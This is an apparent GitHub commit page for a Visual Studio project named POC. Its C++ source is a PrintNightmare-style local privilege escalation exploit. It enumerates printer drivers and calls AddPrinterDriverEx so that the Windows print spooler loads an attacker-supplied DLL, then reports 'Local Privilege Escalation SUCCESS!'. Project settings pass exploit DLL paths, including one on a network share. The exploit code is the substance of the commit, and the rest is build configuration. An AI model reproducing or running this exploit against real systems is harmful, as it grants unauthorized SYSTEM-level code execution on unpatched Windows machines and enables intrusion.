-
Notifications
You must be signed in to change notification settings - Fork 21
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
62 changed files
with
11,209 additions
and
1 deletion.
There are no files selected for viewing
Binary file not shown.
Binary file not shown.
Binary file not shown.
Empty file.
Empty file.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,31 @@ | ||
|
|
||
| Microsoft Visual Studio Solution File, Format Version 12.00 | ||
| # Visual Studio Version 16 | ||
| VisualStudioVersion = 16.0.29324.140 | ||
| MinimumVisualStudioVersion = 10.0.40219.1 | ||
| Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "POC", "POC\POC.vcxproj", "{077B45B2-16D6-4D26-BBFE-C083F7640B08}" | ||
| EndProject | ||
| Global | ||
| GlobalSection(SolutionConfigurationPlatforms) = preSolution | ||
| Debug|x64 = Debug|x64 | ||
| Debug|x86 = Debug|x86 | ||
| Release|x64 = Release|x64 | ||
| Release|x86 = Release|x86 | ||
| EndGlobalSection | ||
| GlobalSection(ProjectConfigurationPlatforms) = postSolution | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Debug|x64.ActiveCfg = Debug|x64 | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Debug|x64.Build.0 = Debug|x64 | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Debug|x86.ActiveCfg = Debug|Win32 | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Debug|x86.Build.0 = Debug|Win32 | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Release|x64.ActiveCfg = Release|x64 | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Release|x64.Build.0 = Release|x64 | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Release|x86.ActiveCfg = Release|Win32 | ||
| {077B45B2-16D6-4D26-BBFE-C083F7640B08}.Release|x86.Build.0 = Release|Win32 | ||
| EndGlobalSection | ||
| GlobalSection(SolutionProperties) = preSolution | ||
| HideSolutionNode = FALSE | ||
| EndGlobalSection | ||
| GlobalSection(ExtensibilityGlobals) = postSolution | ||
| SolutionGuid = {5923C629-610B-403D-89BE-0F23351369AB} | ||
| EndGlobalSection | ||
| EndGlobal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,121 @@ | ||
| #include <iostream> | ||
| #include "resource.h" | ||
| //#include "stdafx.h" | ||
| #include "my_rpc.h" | ||
| #include <xpsprint.h> | ||
| #include <fstream> | ||
| #define RPC_USE_NATIVE_WCHAR | ||
| #include <stdio.h> | ||
| #include <tchar.h> | ||
| #include <io.h> | ||
| #include <time.h> | ||
| #include <Windows.h> | ||
| #include <memory> | ||
| #include <string.h> | ||
| #pragma comment(lib, "rpcrt4.lib") | ||
| using namespace std; | ||
|
|
||
| /* | ||
| reference: | ||
| http://noahblog.360.cn/untitled-3/ | ||
| https://github.com/afwu/PrintNightmare | ||
| */ | ||
|
|
||
| // coded by @evilash | ||
|
|
||
| int wmain(int argc, wchar_t* argv[]) | ||
| { | ||
| //[DLL Path] | ||
| WCHAR src_exp_path[0x200] = { 0 }; | ||
| wsprintf(src_exp_path, L"%s", argv[1]); | ||
|
|
||
|
|
||
| //[define DRIVER_INFO_* structures] | ||
| DRIVER_INFO_2 info; | ||
| info.cVersion = 3; | ||
| info.pConfigFile = src_exp_path; | ||
| info.pDataFile = (LPWSTR)L"C:\\Windows\\System32\\kernelbase.dll"; | ||
| //If target is 2008 | ||
| //info.pDriverPath = (LPWSTR)L"C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_neutral_4616c3de1949be6d\\Amd64\\UNIDRV.DLL"; | ||
| info.pDriverPath = NULL; | ||
| info.pEnvironment = NULL; | ||
| info.pName = (LPWSTR)L"123"; | ||
|
|
||
| //[define for Enum..] | ||
| LPBYTE pinfo = NULL; | ||
| DWORD pcbNeeded; | ||
| DWORD numDriversExist; | ||
|
|
||
| printf("[+] Start Found pDriverPath...\n"); | ||
|
|
||
| //[enumerates installed drivers] | ||
| EnumPrinterDriversW(NULL, | ||
| NULL, | ||
| 2, | ||
| NULL, | ||
| 0, | ||
| &pcbNeeded, | ||
| &numDriversExist | ||
| ); | ||
| printf("[+] numDriversExist: %d\n", numDriversExist); | ||
|
|
||
| try { | ||
| pinfo = (LPBYTE)malloc(pcbNeeded); | ||
| } | ||
| catch (char* e) { | ||
| pinfo = NULL; | ||
| printf("[-] Exception raised: %s\n", e); | ||
| } | ||
|
|
||
| //[Start find Printer Driver] | ||
| BOOL ok = EnumPrinterDriversW(NULL, | ||
| NULL, | ||
| 2, | ||
| pinfo, | ||
| pcbNeeded, | ||
| &pcbNeeded, | ||
| &numDriversExist | ||
| ); | ||
|
|
||
| if (ok != 1) | ||
| { | ||
| printf("[-] find Printer Driver ERR: %d\n", ok); | ||
| } | ||
|
|
||
| printf("[+] find Printer Driver ok\n"); | ||
|
|
||
| DRIVER_INFO_6W* foundInfo = (DRIVER_INFO_6W*)pinfo; | ||
|
|
||
| wprintf(L"[+] Found DriverPath :%s\n\n", foundInfo->pDriverPath); | ||
| wprintf(L"[+] Found DefaultDataType :%s\n\n", foundInfo->pDefaultDataType); | ||
| wprintf(L"[+] Found szHardwareID :%s\n\n", foundInfo->pszHardwareID); | ||
|
|
||
|
|
||
| info.pDriverPath = foundInfo->pDriverPath; | ||
|
|
||
| printf("[+] Start Load DLL to Driver Path\n"); | ||
| DWORD hr = AddPrinterDriverEx(NULL, | ||
| 2, | ||
| (PBYTE)&info, | ||
| APD_COPY_ALL_FILES | 0x10 | 0x8000 | ||
| ); | ||
| printf("[+] AddPrinterDriverEx %d\n",hr); | ||
|
|
||
| if (hr == 1) | ||
| { | ||
| printf("[+] Local Privilege Escalation SUCCESS!\n"); | ||
| } | ||
| else { | ||
| printf("[-] AddPrinterDriverEx \n", hr); | ||
| } | ||
| } | ||
|
|
||
| extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len) | ||
| { | ||
| return(malloc(len)); | ||
| } | ||
|
|
||
| extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * ptr) | ||
| { | ||
| free(ptr); | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,171 @@ | ||
| <?xml version="1.0" encoding="utf-8"?> | ||
| <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||
| <ItemGroup Label="ProjectConfigurations"> | ||
| <ProjectConfiguration Include="Debug|Win32"> | ||
| <Configuration>Debug</Configuration> | ||
| <Platform>Win32</Platform> | ||
| </ProjectConfiguration> | ||
| <ProjectConfiguration Include="Release|Win32"> | ||
| <Configuration>Release</Configuration> | ||
| <Platform>Win32</Platform> | ||
| </ProjectConfiguration> | ||
| <ProjectConfiguration Include="Debug|x64"> | ||
| <Configuration>Debug</Configuration> | ||
| <Platform>x64</Platform> | ||
| </ProjectConfiguration> | ||
| <ProjectConfiguration Include="Release|x64"> | ||
| <Configuration>Release</Configuration> | ||
| <Platform>x64</Platform> | ||
| </ProjectConfiguration> | ||
| </ItemGroup> | ||
| <PropertyGroup Label="Globals"> | ||
| <VCProjectVersion>16.0</VCProjectVersion> | ||
| <ProjectGuid>{077B45B2-16D6-4D26-BBFE-C083F7640B08}</ProjectGuid> | ||
| <Keyword>Win32Proj</Keyword> | ||
| <RootNamespace>POC</RootNamespace> | ||
| <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion> | ||
| </PropertyGroup> | ||
| <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> | ||
| <ConfigurationType>Application</ConfigurationType> | ||
| <UseDebugLibraries>true</UseDebugLibraries> | ||
| <PlatformToolset>v142</PlatformToolset> | ||
| <CharacterSet>Unicode</CharacterSet> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> | ||
| <ConfigurationType>Application</ConfigurationType> | ||
| <UseDebugLibraries>false</UseDebugLibraries> | ||
| <PlatformToolset>v142</PlatformToolset> | ||
| <WholeProgramOptimization>true</WholeProgramOptimization> | ||
| <CharacterSet>Unicode</CharacterSet> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> | ||
| <ConfigurationType>Application</ConfigurationType> | ||
| <UseDebugLibraries>true</UseDebugLibraries> | ||
| <PlatformToolset>v142</PlatformToolset> | ||
| <CharacterSet>Unicode</CharacterSet> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> | ||
| <ConfigurationType>Application</ConfigurationType> | ||
| <UseDebugLibraries>false</UseDebugLibraries> | ||
| <PlatformToolset>v142</PlatformToolset> | ||
| <WholeProgramOptimization>true</WholeProgramOptimization> | ||
| <CharacterSet>Unicode</CharacterSet> | ||
| </PropertyGroup> | ||
| <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> | ||
| <ImportGroup Label="ExtensionSettings"> | ||
| </ImportGroup> | ||
| <ImportGroup Label="Shared"> | ||
| </ImportGroup> | ||
| <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> | ||
| <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
| </ImportGroup> | ||
| <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> | ||
| <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
| </ImportGroup> | ||
| <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> | ||
| <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
| </ImportGroup> | ||
| <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> | ||
| <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> | ||
| </ImportGroup> | ||
| <PropertyGroup Label="UserMacros" /> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> | ||
| <LinkIncremental>true</LinkIncremental> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> | ||
| <LinkIncremental>true</LinkIncremental> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> | ||
| <LinkIncremental>false</LinkIncremental> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> | ||
| <LinkIncremental>false</LinkIncremental> | ||
| </PropertyGroup> | ||
| <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> | ||
| <ClCompile> | ||
| <PrecompiledHeader> | ||
| </PrecompiledHeader> | ||
| <WarningLevel>Level3</WarningLevel> | ||
| <Optimization>Disabled</Optimization> | ||
| <SDLCheck>false</SDLCheck> | ||
| <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
| <ConformanceMode>true</ConformanceMode> | ||
| </ClCompile> | ||
| <Link> | ||
| <SubSystem>Console</SubSystem> | ||
| <GenerateDebugInformation>true</GenerateDebugInformation> | ||
| </Link> | ||
| </ItemDefinitionGroup> | ||
| <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> | ||
| <ClCompile> | ||
| <PrecompiledHeader> | ||
| </PrecompiledHeader> | ||
| <WarningLevel>Level3</WarningLevel> | ||
| <Optimization>Disabled</Optimization> | ||
| <SDLCheck>true</SDLCheck> | ||
| <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
| <ConformanceMode>true</ConformanceMode> | ||
| <RuntimeLibrary>MultiThreaded</RuntimeLibrary> | ||
| </ClCompile> | ||
| <Link> | ||
| <SubSystem>Console</SubSystem> | ||
| <GenerateDebugInformation>true</GenerateDebugInformation> | ||
| </Link> | ||
| </ItemDefinitionGroup> | ||
| <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> | ||
| <ClCompile> | ||
| <PrecompiledHeader> | ||
| </PrecompiledHeader> | ||
| <WarningLevel>Level3</WarningLevel> | ||
| <Optimization>MaxSpeed</Optimization> | ||
| <FunctionLevelLinking>true</FunctionLevelLinking> | ||
| <IntrinsicFunctions>true</IntrinsicFunctions> | ||
| <SDLCheck>false</SDLCheck> | ||
| <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
| <ConformanceMode>true</ConformanceMode> | ||
| <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> | ||
| <RuntimeLibrary>MultiThreaded</RuntimeLibrary> | ||
| </ClCompile> | ||
| <Link> | ||
| <SubSystem>Console</SubSystem> | ||
| <EnableCOMDATFolding>true</EnableCOMDATFolding> | ||
| <OptimizeReferences>true</OptimizeReferences> | ||
| <GenerateDebugInformation>true</GenerateDebugInformation> | ||
| </Link> | ||
| </ItemDefinitionGroup> | ||
| <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> | ||
| <ClCompile> | ||
| <PrecompiledHeader> | ||
| </PrecompiledHeader> | ||
| <WarningLevel>Level3</WarningLevel> | ||
| <Optimization>MaxSpeed</Optimization> | ||
| <FunctionLevelLinking>true</FunctionLevelLinking> | ||
| <IntrinsicFunctions>true</IntrinsicFunctions> | ||
| <SDLCheck>true</SDLCheck> | ||
| <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> | ||
| <ConformanceMode>true</ConformanceMode> | ||
| <RuntimeLibrary>MultiThreaded</RuntimeLibrary> | ||
| </ClCompile> | ||
| <Link> | ||
| <SubSystem>Console</SubSystem> | ||
| <EnableCOMDATFolding>true</EnableCOMDATFolding> | ||
| <OptimizeReferences>true</OptimizeReferences> | ||
| <GenerateDebugInformation>true</GenerateDebugInformation> | ||
| </Link> | ||
| </ItemDefinitionGroup> | ||
| <ItemGroup> | ||
| <ClCompile Include="POC.cpp" /> | ||
| <ClCompile Include="my_rpc.c" /> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <ClInclude Include="resource.h" /> | ||
| <ClInclude Include="my_rpc.h" /> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <ResourceCompile Include="Resource.rc" /> | ||
| </ItemGroup> | ||
| <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> | ||
| <ImportGroup Label="ExtensionTargets"> | ||
| </ImportGroup> | ||
| </Project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| <?xml version="1.0" encoding="utf-8"?> | ||
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||
| <ItemGroup> | ||
| <Filter Include="源文件"> | ||
| <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> | ||
| <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> | ||
| </Filter> | ||
| <Filter Include="头文件"> | ||
| <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> | ||
| <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions> | ||
| </Filter> | ||
| <Filter Include="资源文件"> | ||
| <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> | ||
| <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> | ||
| </Filter> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <ClCompile Include="POC.cpp"> | ||
| <Filter>源文件</Filter> | ||
| </ClCompile> | ||
| <ClCompile Include="my_rpc.c"> | ||
| <Filter>源文件</Filter> | ||
| </ClCompile> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <ClInclude Include="resource.h"> | ||
| <Filter>头文件</Filter> | ||
| </ClInclude> | ||
| <ClInclude Include="my_rpc.h"> | ||
| <Filter>头文件</Filter> | ||
| </ClInclude> | ||
| </ItemGroup> | ||
| <ItemGroup> | ||
| <ResourceCompile Include="Resource.rc"> | ||
| <Filter>源文件</Filter> | ||
| </ResourceCompile> | ||
| </ItemGroup> | ||
| </Project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| <?xml version="1.0" encoding="utf-8"?> | ||
| <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> | ||
| <LocalDebuggerCommandArguments>192.168.228.191 \\192.168.228.1\test\MyExploit.dll test 123</LocalDebuggerCommandArguments> | ||
| <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> | ||
| <LocalDebuggerCommandArguments>C:\share\MyPigDLL.dll</LocalDebuggerCommandArguments> | ||
| <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> | ||
| </PropertyGroup> | ||
| <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> | ||
| <LocalDebuggerCommandArguments>C:\share\MyPigDLL.dll</LocalDebuggerCommandArguments> | ||
| <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> | ||
| </PropertyGroup> | ||
| </Project> |
Binary file not shown.
Binary file not shown.
Oops, something went wrong.